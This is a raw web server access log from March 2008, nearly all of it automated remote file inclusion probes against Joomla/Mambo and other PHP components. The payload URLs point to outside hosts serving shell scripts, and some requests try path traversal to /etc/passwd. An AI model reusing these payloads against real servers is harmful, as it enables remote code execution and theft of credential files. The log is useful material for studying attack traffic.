201.76.163.42 - - [13/Mar/2008:08:06:46 -0700] "GET /logs/access_080131.log/xGB.php?act=admin&do=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.98.78.98 - - [13/Mar/2008:08:06:56 -0700] "GET /logs/access_080124.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://chyna.sufx.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.238.195.13 - - [13/Mar/2008:08:07:26 -0700] "GET /logs/access_080117.log/administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.107.122 - - [13/Mar/2008:08:07:38 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:08:08:20 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:08:08:20 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:08:08:20 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.freewebtown.com/crxr/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:08:08:20 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://www.freewebtown.com/crxr/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
217.162.147.212 - - [13/Mar/2008:08:08:43 -0700] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:08:08:54 -0700] "GET /logs/access_080204.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:08:08:54 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:08:08:54 -0700] "GET /logs/access_080204.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:08:08:54 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:08:08:54 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:08:08:54 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:08:08:58 -0700] "GET /logs/access_080204.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:08:08:58 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:08:08:58 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.108 - - [13/Mar/2008:08:10:29 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.234.242.100 - - [13/Mar/2008:08:10:51 -0700] "GET /logs/access_071229.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [13/Mar/2008:08:10:51 -0700] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [13/Mar/2008:08:10:51 -0700] "GET /logs/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.102 - - [13/Mar/2008:08:11:39 -0700] "GET /logs/access_080117.log HTTP/1.0" 200 670488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.234.242.100 - - [13/Mar/2008:08:11:43 -0700] "GET /logs/access_080122.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.107.122 - - [13/Mar/2008:08:12:18 -0700] "GET /logs/access_080225.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [13/Mar/2008:08:12:18 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [13/Mar/2008:08:12:18 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.213.31 - - [13/Mar/2008:08:13:11 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [13/Mar/2008:08:13:11 -0700] "GET /megumi/Bracelet?M=A HTTP/1.0" 301 88 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [13/Mar/2008:08:13:11 -0700] "GET /megumi/Bracelet/?M=A HTTP/1.0" 200 1689 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
82.98.78.98 - - [13/Mar/2008:08:14:00 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://chyna.sufx.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.98.78.98 - - [13/Mar/2008:08:14:01 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://chyna.sufx.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.98.78.98 - - [13/Mar/2008:08:14:01 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://chyna.sufx.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.98.78.98 - - [13/Mar/2008:08:14:20 -0700] "GET /logs/access_080225.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://chyna.sufx.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:08:14:53 -0700] "GET /logs/access_080131.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:08:14:53 -0700] "GET /logs/access_080131.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:08:14:53 -0700] "GET /logs/access_080131.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:08:17:30 -0700] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:08:17:30 -0700] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:08:17:31 -0700] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://www.freewebtown.com/crxr/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:08:17:31 -0700] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://www.freewebtown.com/crxr/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
70.84.237.162 - - [13/Mar/2008:08:21:08 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=ftp://85.25.48.60/cmd?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
70.84.237.162 - - [13/Mar/2008:08:21:08 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=ftp://85.25.48.60/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.22.112.178 - - [13/Mar/2008:08:21:31 -0700] "GET /logs/access_071229.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://angel.yum.pl/joomla/templates/head.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.112.178 - - [13/Mar/2008:08:21:31 -0700] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://angel.yum.pl/joomla/templates/head.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.112.178 - - [13/Mar/2008:08:21:40 -0700] "GET /logs/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://angel.yum.pl/joomla/templates/head.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.76.163.42 - - [13/Mar/2008:08:21:52 -0700] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.76.163.42 - - [13/Mar/2008:08:21:53 -0700] "GET /convert/mvcw.php?vwar_root=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.76.163.42 - - [13/Mar/2008:08:21:54 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.22.112.178 - - [13/Mar/2008:08:23:03 -0700] "GET /logs/access_080122.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://angel.yum.pl/joomla/templates/head.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.216.97 - - [13/Mar/2008:08:23:51 -0700] "GET /logs/access_080201.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:08:24:00 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:08:24:00 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:08:24:00 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:08:24:00 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [13/Mar/2008:08:24:10 -0700] "GET /logs/%030iSupport/index.php?include_file=http://chyna.sufx.net/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
84.18.207.65 - - [13/Mar/2008:08:24:10 -0700] "GET /%030iSupport/index.php?include_file=http://chyna.sufx.net/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:08:24:25 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:08:24:25 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.76.163.42 - - [13/Mar/2008:08:25:56 -0700] "GET /logs/access_080108.log/convert/mvcw.php?vwar_root=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.225.214.179 - - [13/Mar/2008:08:25:58 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
66.225.214.179 - - [13/Mar/2008:08:26:03 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
70.85.201.66 - - [13/Mar/2008:08:26:42 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.172.174.208 - - [13/Mar/2008:08:27:24 -0700] "GET //database.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
217.172.174.208 - - [13/Mar/2008:08:27:27 -0700] "GET /logs//database.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:08:27:54 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:08:27:56 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
82.98.78.98 - - [13/Mar/2008:08:30:03 -0700] "GET /logs/access_080201.log//claroline/tracking/userLog.php?rootSys=http://chyna.sufx.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.98.78.98 - - [13/Mar/2008:08:30:03 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://chyna.sufx.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.98.78.98 - - [13/Mar/2008:08:30:03 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://chyna.sufx.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.107.122 - - [13/Mar/2008:08:30:17 -0700] "GET /logs/access_080225.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [13/Mar/2008:08:31:08 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.15.196.106 - - [13/Mar/2008:08:31:08 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.180.89.68 - - [13/Mar/2008:08:31:56 -0700] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.198.112 - - [13/Mar/2008:08:32:04 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://familia.oscarreno.com.mx//modules/Forums/admin/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
66.7.198.112 - - [13/Mar/2008:08:32:04 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://familia.oscarreno.com.mx//modules/Forums/admin/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
66.225.214.179 - - [13/Mar/2008:08:34:08 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://ehlcc.com/administrator/modules/pro/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
66.225.214.179 - - [13/Mar/2008:08:34:08 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://ehlcc.com/administrator/modules/pro/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
74.52.2.130 - - [13/Mar/2008:08:36:18 -0700] "GET /index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.107.122 - - [13/Mar/2008:08:36:51 -0700] "GET /logs/access_080119.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.247.208.11 - - [13/Mar/2008:08:39:46 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cooprr.com//components/com_facileforms/strings.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.247.208.11 - - [13/Mar/2008:08:43:04 -0700] "GET /logs/access_080211.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cooprr.com//components/com_facileforms/strings.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.247.208.11 - - [13/Mar/2008:08:43:05 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cooprr.com//components/com_facileforms/strings.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.247.208.11 - - [13/Mar/2008:08:43:05 -0700] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cooprr.com//components/com_facileforms/strings.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.235.74 - - [13/Mar/2008:08:43:37 -0700] "GET /index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.87.116 - - [13/Mar/2008:08:43:38 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
72.249.87.116 - - [13/Mar/2008:08:43:38 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
213.190.39.103 - - [13/Mar/2008:08:43:54 -0700] "GET //calendar.php?pftp://213.184.65.80/incoming/upload/trop/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
116.125.113.115 - - [13/Mar/2008:08:44:58 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fumolecanne.interfree.it/fuck.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
116.125.113.115 - - [13/Mar/2008:08:44:58 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fumolecanne.interfree.it/fuck.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
217.172.174.208 - - [13/Mar/2008:08:45:58 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
217.172.174.208 - - [13/Mar/2008:08:45:59 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
124.217.247.200 - - [13/Mar/2008:08:46:07 -0700] "GET /inurl:amemberhttp://treff-erotik.com/sub-treff/images/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.78.66.102 - - [13/Mar/2008:08:46:11 -0700] "GET /logs/access_080117.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:08:50:04 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:08:50:04 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:08:50:04 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/crxr/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:08:50:04 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/crxr/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
64.38.24.138 - - [13/Mar/2008:08:51:46 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.24.138 - - [13/Mar/2008:08:51:47 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.24.138 - - [13/Mar/2008:08:51:47 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
